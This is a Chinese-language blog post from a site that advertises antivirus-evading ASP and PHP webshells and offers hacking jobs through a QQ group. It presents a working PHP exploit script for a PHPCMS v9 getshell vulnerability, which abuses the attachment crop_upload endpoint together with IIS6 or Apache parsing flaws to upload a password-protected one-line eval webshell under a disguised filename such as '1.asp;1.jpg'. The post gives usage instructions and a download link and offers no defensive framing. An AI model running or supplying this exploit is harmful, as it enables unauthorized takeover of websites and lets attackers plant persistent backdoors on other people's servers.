实战最新phpcms v9,再爆getshell漏洞 | 最新免杀asp木马|asp大马

火热虚拟主机提权专用Asp大马火热推荐免杀Asp木马隐藏防删 火热最经典Php大马解密版

火爆最新更新暗组免杀Php大马火爆免杀超越神界Asp大马下载 火爆免杀Asp草泥马4.0版

接单交流QQ群:136549649

实战最新phpcms v9,再爆getshell漏洞

2012-10-01

phpcms v9 漏洞对环境要求比较大,得存在iis6 或者apache的解析漏洞才能利用、

ps:exp存在稍许问题,比如目标站为二级目录无法处理,请自行修改。

利用方式:php  v9.php  www.mumaasp.com  1

1为asp 2为php  3为apache 的版本 ,使用前得摸清楚对方是什么环境

贴代码:

<?php

error_reporting(E_ERROR);

set_time_limit(0);

$pass=”mumaasp.com”;

print_r(‘

+—————————————————————————+

PHPCms V9 GETSHELL 0DAY

c0de by testr00ttest

针对iis6.0的漏洞 有点鸡肋 但是也可以用

apache 是老版本可能会产生问题

+—————————————————————————+

‘);

echo ‘密码为’.$pass;

if ($argc < 2) {

print_r(‘

+—————————————————————————+

Usage: php ‘.$argv[0].’ url [js]

js 类型配置 1为asp 2为php 3为apache 的版本

Example:

php ‘.$argv[0].’ www.mumaasp.com 1

+—————————————————————————+

‘);

exit;

}

$url=$argv[1];

$js=$argv[2];//写入脚本类型 mumaasp.com

 

$phpshell=’<?php @eval($_POST[\''.$pass.'\']);?>’;

$aspshell=’<%eval request(“‘.$pass.’”)%>’;

 

if($js==1){

$file=”1.asp;1.jpg”;

$ret=GetShell($url,$aspshell,$file);

 

}else if($js==2){

$file=”1.php;1.jpg”;

$ret=GetShell($url,$phpshell,$file);

}else if($js==3){

$file=”1.php.jpg”;

$ret=GetShell($url,$phpshell,$file);

}else{

print_r(‘没有选择脚本类型’);

}

$pattern = “|http:\/\/[^,]+?\.jpg,?|U”;

preg_match_all($pattern, $ret, $matches);

if($matches[0][0]){

echo “\r\nurl地址:”.$matches[0][0];

}else{

echo “\r\n没得到!”;

}

 

function GetShell($url,$shell,$js){

$content =$shell;

$data = “POST /index.php?m=attachment&c=attachments&a=crop_upload&width=1&height=1&file=http://”.$url.”/uploadfile/”.$js.” HTTP/1.1\r\n”;

$data .= “Host: “.$url.”\r\n”;

$data .= “User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n”;

$data .= “Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n”;

$data .= “Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3\r\n”;

$data .= “Connection: close\r\n”;

$data .= “Content-Length: “.strlen($content).”\r\n\r\n”;

$data .= $content.”\r\n”;

//echo $data;

$ock=fsockopen($url,80);

if (!$ock) {

echo ” No response from “.$url.”\n”;

}

fwrite($ock,$data);

$resp = ”;

while (!feof($ock)) {

$resp.=fread($ock, 1024);

}

return $resp;

}

 

 

?>

 

下载exp

  • Asp免杀大马发布,转载请注明 : http://www.mumaasp.com/14.html
  • 分类:Asp大马后门 | 标签: | 5,428人 浏览

    发表评论

    电子邮件地址不会被公开。 必填项已用 * 标注

    *

    您可以使用这些 HTML 标签和属性: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>